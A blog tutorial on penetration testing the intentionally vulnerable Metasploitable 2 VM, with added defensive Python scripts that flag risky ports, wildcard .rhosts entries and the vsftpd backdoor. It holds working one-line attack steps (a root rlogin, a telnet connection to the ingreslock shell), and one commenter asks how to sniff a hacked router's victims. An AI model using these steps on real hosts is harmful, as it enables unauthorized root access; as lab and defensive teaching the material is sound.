Thursday, May 1, 2014

Metasploitable 2 : Vulnerability assessment and Remote Login

If you've followed my previous tutorial on Introduction to Metasploitable 2, then you should be sitting here with Kali Linux and Metasploitable 2 up and running. So, I'm gonna skip the formalities and move right ahead.


Portscan

On the Kali Linux machine, open a terminal, type ifconfig and note the eth0 IP address. This tells you which subnet the target is likely on. In my case, ifconfig returned my IPv4 address as 192.168.154.131, so Metasploitable must have an IP somewhere in the 192.168.154.xxx range. To SYN-scan every host in that range with Nmap, run the following (a SYN scan needs root, which you already are on Kali):
nmap -sS 192.168.154.0/24




The conclusion is that the Metasploitable 2 machine has the IP 192.168.154.132, and that it has a large number of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the Metasploitable machine, after logging in with msfadmin:msfadmin, you can run ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever it is in your case).
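Once you have a scan like the one above, the useful next step for a defender is to triage it rather than read it by eye. The following is an added example of mine, not code from the original post: a small Python script that reads Nmap's grepable output (produced with `nmap -sS -oG scan.gnmap 192.168.154.0/24`) and flags any host exposing the legacy remote-login and backdoor ports this post goes on to discuss. The scan text embedded in it is constructed to resemble the result above; it is not real Nmap output.

```python
"""Triage nmap grepable (-oG) output: flag hosts exposing legacy remote-login
and known-backdoor ports such as those found on Metasploitable 2.
Added example; the sample scan below is constructed, not real nmap output."""
import re
from collections import defaultdict

# Ports this post treats as direct entry points, with the reason to report.
WATCHLIST = {
    21: "FTP (vsftpd; the backdoored build spawns a shell on 6200)",
    512: "rexec (r-service: cleartext, host-trust authentication)",
    513: "rlogin (r-service: cleartext, .rhosts/hosts.equiv trust)",
    514: "rsh (r-service: cleartext, host-trust authentication)",
    1524: "ingreslock (known bind shell on Metasploitable 2)",
    6200: "vsftpd backdoor listener",
}

# One port entry in -oG output looks like 513/open/tcp//login///
# (state may be a combination such as open|filtered).
PORT_RE = re.compile(r"(\d+)/([a-z|]+)/(\w+)/")

# Constructed sample modelled on the scan in the post, not real output.
SAMPLE_SCAN = """\
# Nmap grepable output (constructed sample for this example)
Host: 192.168.154.131 ()\tStatus: Up
Host: 192.168.154.131 ()\tPorts: 22/open/tcp//ssh///\tIgnored State: closed (999)
Host: 192.168.154.132 ()\tStatus: Up
Host: 192.168.154.132 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 512/open/tcp//exec///, 513/open/tcp//login///, 514/open/tcp//shell///, 1524/open/tcp//ingreslock///\tIgnored State: closed (993)
"""


def parse_grepable(text):
    """Map each host IP to a list of (port, state, proto) parsed from -oG text."""
    hosts = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        # The Ports field ends at the tab that starts "Ignored State:".
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto in PORT_RE.findall(ports_field):
            hosts[ip].append((int(port), state, proto))
    return dict(hosts)


def flag_hosts(scan):
    """Return {ip: [(port, reason), ...]} for hosts with open watchlisted TCP ports."""
    findings = {}
    for ip, ports in scan.items():
        hits = sorted((p, WATCHLIST[p]) for p, state, proto in ports
                      if state == "open" and proto == "tcp" and p in WATCHLIST)
        if hits:
            findings[ip] = hits
    return findings


if __name__ == "__main__":
    for ip, hits in flag_hosts(parse_grepable(SAMPLE_SCAN)).items():
        print(f"{ip}: {len(hits)} high-risk port(s)")
        for port, reason in hits:
            print(f"  {port:>5}/tcp  {reason}")
```

Point it at a real `-oG` file by reading the file into `parse_grepable`; only ports reported as plainly `open` are flagged, so an `open|filtered` result (common when a firewall is in the way) is kept in the parsed data but not reported as a finding.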

Vulnerabilities

The Metasploitable 2 operating system ships with a large number of vulnerabilities, of the following kinds:
  1. Misconfigured services - many services are misconfigured and provide direct entry into the operating system.
  2. Backdoors - a few programs and services have been backdoored, and these backdoors can be used to gain access to the OS.
  3. Weak passwords - these are vulnerable to brute-force attacks.
  4. Vulnerable web services - a few web services pre-installed on Metasploitable have known vulnerabilities which can be exploited.
  5. Web application vulnerabilities - some vulnerable web applications can be exploited to gain entry to the system.
Rapid7 has a very thorough article covering many of these vulnerabilities on its website.

Exploiting The Vulnerabilities

Remote access vulnerability - Rlogin

Remember the list of open ports you came across during the port scan? Ports 512, 513 and 514 are used by the classic Unix remote-login services (rlogin among them). They have been misconfigured in such a way that anyone can open a remote session without proper authentication. This vulnerability is easy to exploit: we will use rlogin to log in to Metasploitable 2 remotely. Type rlogin on its own to see the command's usage.


root@kali:~# rlogin
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
           [-D [bind_address:]port] [-e escape_char] [-F configfile]
           [-I pkcs11] [-i identity_file]
           [-L [bind_address:]port:host:hostport]
           [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
           [-R [bind_address:]port:host:hostport] [-S ctl_path]
           [-W host:port] [-w local_tun[:remote_tun]]
           [user@]hostname [command] 
 
Now try to log in as root:
rlogin -l root 192.168.154.132
Most probably you will get something like this:

root@kali:~# rlogin -l root 192.168.154.132
The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.
RSA key fingerprint is *****.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.154.132' (RSA) to the list of known hosts.
root@192.168.154.132's password: 

As you can see, it is asking for a password. That is not because the target isn't vulnerable; it is because rsh-client is not installed on Kali, so the rlogin command is actually the OpenSSH client under another name (which is also why the usage text above is ssh's). The rsh-client package provides the real rlogin, a remote-login utility that lets users connect to remote machines. Install it with:
apt-get install rsh-client
This starts the installation process; you'll have to type yes once or twice and Kali does the rest. Once the installation has finished, run the previous command again. This time around, things go better:



root@kali:~# rlogin -l root 192.168.154.132
Last login: Thu May  1 11:34:55 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# 

Now you have a root shell on Metasploitable 2. That was as easy as typing one line (and installing a package). There is one more vulnerability that is just as easy to exploit.
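The post says the r-services are "misconfigured" but not how. The usual cause, and what this added example (mine, not the post's) checks for, is a wildcard entry in a user's ~/.rhosts or in /etc/hosts.equiv: a "+" in the host column trusts every host, a "+" in the user column trusts every user on that host, and "+ +" trusts everyone, so rlogind hands out a session with no password prompt at all. That is the assumption behind the checks below; the file contents embedded in the script are constructed samples.

```python
"""Audit rhosts-style trust files (~/.rhosts, /etc/hosts.equiv) for wildcard
entries that let remote users log in over rlogin/rsh without a password.
Added example with constructed sample files, not part of the original post."""

# Constructed samples: a wide-open root account and a mixed hosts.equiv.
SAMPLE_ROOT_RHOSTS = """\
# constructed: trusts every user from every host as root
+ +
"""

SAMPLE_HOSTS_EQUIV = """\
# constructed: one explicit host, one denied host, one wildcard
buildbox.lab.example
-badhost.lab.example
+
"""


def parse_rhosts(text):
    """Return entries as dicts: line, host, user (or None), deny.
    Each non-comment line is 'host [user]'; a leading '-' on the host denies
    it, and '+' in either column is a wildcard."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        host = parts[0]
        user = parts[1] if len(parts) > 1 else None
        entries.append({
            "line": lineno,
            "host": host[1:] if host.startswith("-") else host,
            "user": user,
            "deny": host.startswith("-"),
        })
    return entries


def audit_trust_file(text, path):
    """Return [(severity, message)] for wildcard trust entries in one file."""
    findings = []
    for e in parse_rhosts(text):
        if e["deny"]:
            continue  # a denied host cannot grant access, even with wildcards
        where = f"{path}:{e['line']}"
        if e["host"] == "+" and e["user"] == "+":
            findings.append(("critical", f"{where}: '+ +' trusts every user on every host"))
        elif e["host"] == "+":
            who = e["user"] or "the same username"
            findings.append(("high", f"{where}: any host may log in as {who}"))
        elif e["user"] == "+":
            findings.append(("high", f"{where}: any user on {e['host']} may log in"))
    return findings


def audit_all(files):
    """files: {path: content}. Return findings across all files, worst first."""
    order = {"critical": 0, "high": 1}
    results = []
    for path, text in files.items():
        results.extend(audit_trust_file(text, path))
    return sorted(results, key=lambda f: order[f[0]])


if __name__ == "__main__":
    report = audit_all({"/root/.rhosts": SAMPLE_ROOT_RHOSTS,
                        "/etc/hosts.equiv": SAMPLE_HOSTS_EQUIV})
    for severity, msg in report:
        print(f"[{severity.upper()}] {msg}")
```

On a real host, feed it the contents of /etc/hosts.equiv and every user's .rhosts. The fix for a finding is to delete the wildcard line, and the durable fix is to retire rsh/rlogin/rexec altogether in favour of SSH, since the r-services also send everything in cleartext.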

Telnet Vulnerability

Look at the open-port list again. On port 21, Metasploitable 2 runs vsftpd, a popular FTP server. The version installed on Metasploitable contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people had downloaded it. If the username sent to the server ends in the sequence ":)" (the happy smiley), the backdoored version opens a listening shell on port 6200. This means anyone can log in to the machine without knowing any credentials, just by using :). It can be exploited using Metasploit, which we will cover in the next tutorial. Till then, something for your appetite:
telnet 192.168.99.131 1524
This is another one-line exploit, against the ingreslock service on port 1524 (see the port-scan result); substitute the IP of your own Metasploitable machine (192.168.154.132 in my case). I will post more stuff soon, but this is all for now.
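From the defender's side, the backdoor described above leaves two traces: the trigger string in the FTP USER command and a new listener on port 6200. The script below is an added example of mine, not code from the post, that looks for both. It assumes vsftpd was run with log_ftp_protocol=YES (a real vsftpd option that logs every FTP command), and the log and netstat lines embedded in it are constructed samples. It matches ":)" anywhere in the username, which is broader than the "ends in" trigger the post describes and therefore still catches it.

```python
"""Detect the vsftpd backdoor from the defender's side: look for the ':)'
trigger in logged USER commands and for the port 6200 listener it opens.
Added example with constructed log/netstat lines, not part of the original post."""
import re

# vsftpd with log_ftp_protocol=YES logs each command like this (constructed lines):
SAMPLE_VSFTPD_LOG = """\
Thu May  1 11:30:02 2014 [pid 4321] CONNECT: Client "192.168.154.140"
Thu May  1 11:30:02 2014 [pid 4321] FTP command: Client "192.168.154.140", "USER anonymous"
Thu May  1 11:30:03 2014 [pid 4321] FTP response: Client "192.168.154.140", "331 Please specify the password."
Thu May  1 11:34:50 2014 [pid 4388] CONNECT: Client "192.168.154.131"
Thu May  1 11:34:50 2014 [pid 4388] FTP command: Client "192.168.154.131", "USER audit:)"
"""

# Constructed 'netstat -tln' style listing that includes the backdoor listener.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6200            0.0.0.0:*               LISTEN
"""

USER_CMD_RE = re.compile(
    r'^(?P<ts>.+?) \[pid \d+\] FTP command: Client "(?P<client>[^"]+)", "USER (?P<user>.*)"$'
)
TRIGGER = ":)"
BACKDOOR_PORT = 6200


def find_trigger_attempts(log_text):
    """Return [(timestamp, client_ip, username)] for USER commands containing ':)'."""
    hits = []
    for line in log_text.splitlines():
        m = USER_CMD_RE.match(line)
        if m and TRIGGER in m.group("user"):
            hits.append((m.group("ts"), m.group("client"), m.group("user")))
    return hits


def listening_ports(netstat_text):
    """Return the set of local TCP ports in LISTEN state from netstat -tln output."""
    ports = set()
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) >= 6 and fields[0].startswith("tcp") and fields[-1] == "LISTEN":
            # Local address is host:port; rsplit copes with IPv6 forms like :::6200.
            ports.add(int(fields[3].rsplit(":", 1)[1]))
    return ports


def assess(log_text, netstat_text):
    """Combine both signals into a verdict: 'compromised', 'attempted' or 'clean'."""
    attempts = find_trigger_attempts(log_text)
    shell_open = BACKDOOR_PORT in listening_ports(netstat_text)
    if shell_open:
        return "compromised", attempts
    if attempts:
        return "attempted", attempts
    return "clean", attempts


if __name__ == "__main__":
    verdict, attempts = assess(SAMPLE_VSFTPD_LOG, SAMPLE_NETSTAT)
    print(f"verdict: {verdict}")
    for ts, client, user in attempts:
        print(f"  {ts}  {client}  USER {user!r}")
```

A "compromised" verdict means the listener is already up, whatever the log says, since an attacker may have triggered it before protocol logging was enabled. The remediation is to replace the backdoored vsftpd build with a clean one whose checksum you have verified against the vendor's, and to block port 6200 at the host firewall as a stopgap.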

34 comments:

  1. Hi, found something to add.
    Users need to set their VM internet connection as "VM" to scan ports. Otherwise the ifconfig will not provide correct IP.

    1. Please elaborate. I didn't get you. Are you talking about the port-scan step?

  2. Hi , i have hacked some routers (TP_Link and D_Link)...so i have full-complete access
    to the victim's router web interface....( my OS=Kali ) ....is there any way to sniff PC data traffic behind NAT???((except DNS Spoofing))......

    1. Web Interface is nice but yields little. You need to gain root access if you want to get anywhere,

  3. where can i find the rest of your tutorials on this?

  4. hii
    first amazing site love it
    and second i cant find any ports .
    my lp run kali and my pc run VM Metasploitable2
    i use nmap and get this >>>>
    note : host seems down , if it is really up , but blocking our ping probes , try -Pn ( i try it not working too)
    nmap done : 1 IP Address ( 0 host up ) .
    what i need to do ?
    thanks .

    1. you must ensure your metasploitable is up and running when scanning

  5. Your metasploitable2 must be up and running when you are testing

  6. scanning with nmap shows all ports are filtered. what should i do?

    1. turn off the firewall, or slow down the scan so firewall doesn't detect it. Also experiment with scan types

  7. Hi,

    I followed up to the step where you download the RSH client. I am using a Kali VM and Metasploitable VM at the same time. For some reason when I try to remote login to Metasploitable now I get rlogind: Permission denied. Can you possibly help me out with this? I have been stuck for two days!

  8. hi
    i am using windows 10 and i have installed metasploitable in virtual box. so how will i use metasploit in metasploitable

    1. Follow this guide for setup your Pentest lab: https://www.hackingloops.com/kali-linux-virtualbox-pentest-lab/

  9. I think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article. GRC

  10. A residence permit for spouses and minor children can be obtained together with the main investor. The procedure for obtaining a temporary residence permit takes 1 to 3 months. https://www.baltic-legal.com/legal-services-eng.htm

  11. You know your projects stand out of the herd. There is something special about them. It seems to me all of them are really brilliant! virtual assessment centre

  12. Traffic Lawyer Greensville VA. The way you are describing it is awesome. Keep on sharing more.

  13. Metasploitable 2, an intentionally vulnerable virtual machine designed for training and educational purposes, serves as a crucial tool for cybersecurity professionals and enthusiasts aiming to practice vulnerability assessment and penetration testing skills. This platform exposes users to a wide range of vulnerabilities that mirror real-world weaknesses found in poorly secured systems, offering a hands-on experience in identifying and exploiting these flaws. Through the use of tools and techniques for vulnerability assessment, individuals can uncover weaknesses in services such as FTP, SSH, and web applications running on Metasploitable 2. Furthermore, it facilitates the practice of remote login exploitation, allowing users to hone their skills in gaining unauthorized access to systems via network services. Engaging with Metasploitable 2 not only enhances technical proficiency in a safe and controlled environment but also deepens the understanding of the importance of robust cybersecurity measures and the potential consequences of neglecting system security.
    motorcycle accident injury attorney

  14. Kali Tutorials refers to instructional materials, guides, or resources designed to educate users on how to use Kali Linux, a popular distribution of Linux specifically tailored for penetration testing and cybersecurity tasks. These tutorials typically cover various aspects of Kali Linux, including installation, configuration, basic commands, and advanced techniques for conducting security assessments and ethical hacking. Kali Tutorials aim to provide users with practical knowledge and skills to effectively utilize Kali Linux for testing and securing computer systems and networks.
    Fairfax Divorce Lawyer
    Divorce Lawyers Fairfax VA




  15. A Reckless Driving Attorney In New Jersey can help defend you against charges, protect your rights, and minimize penalties associated with reckless driving violations in the state.

  16. Your blog continues to inspire and enlighten me. Your adept handling of complex topics with finesse and clarity is truly remarkable. The recent post was exceptionally well-articulated, offering valuable insights that broadened my horizons. Your talent for engaging readers and making learning enjoyable is a rare quality. Thank you for your unwavering commitment and dedication – it doesn't go unnoticed!

  17. This article offers a unique take on a subject often left unexplored. The author's insights shed new light on familiar concepts, skillfully weaving together diverse ideas into a cohesive narrative. It's clear that considerable thought and expertise were poured into crafting this compelling piece. I'm excited to explore more of the content produced by this insightful writer

    1. This article provides a refreshing perspective on a commonly discussed topic. The author's insightful approach and skillful synthesis of ideas create a compelling read. I look forward to delving deeper into more of their thought-provoking content.

  18. Stumbling upon this post feels like uncovering a hidden gem within daily interactions. The author skillfully captures the spirit of our time, expressing universal human experiences with profound clarity and empathy. Each sentence resonates deeply, encouraging introspection and mutual understanding. We truly value this insightful and thought-provoking contribution.

  19. Your blog post was fantastic! The way you communicate complex ideas with such clarity and enthusiasm is impressive. I always learn something new from your posts, and this one was no exception. Thank you for sharing your insights and for making your blog such an enjoyable and informative read.

  20. Happy Birthday Wishes
    ! May your wonderful day be filled with pleasure, laughter, and everything you enjoy. I wish you another year of health, happiness, and prosperity. Enjoy every moment and create lasting memories. Here's to celebrating you and all that makes you special. Cheers!

  21. This article is too good not to share! My friends and colleagues need to see the fantastic information it contains.

    Visit our link for ISO Certification in Riyadh

  22. The Geometry Dash game uses simple controls—just tap the screen or click the mouse to make your character jump. Timing is everything, as you need to avoid spikes, gaps, and other hazards.

  23. The primary advantage of using an SSO ID is convenience. Instead of juggling multiple usernames and passwords for different platforms, you only need to remember one. This not only makes logging in faster and easier but also reduces the risk of security breaches. With fewer passwords to remember, you're less likely to write them down or use weak passwords, both of which can compromise security.

    SSO IDs also simplify the management of user access for organizations. IT administrators can easily control and monitor access to various services, ensuring that employees or students have the appropriate level of access based on their role or status.

  24. This detailed analysis of Metasploitable 2 vulnerabilities is incredibly insightful! It’s a fantastic resource for anyone looking to enhance their cybersecurity skills. Visit our Website ISO Certification In Philippines



© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.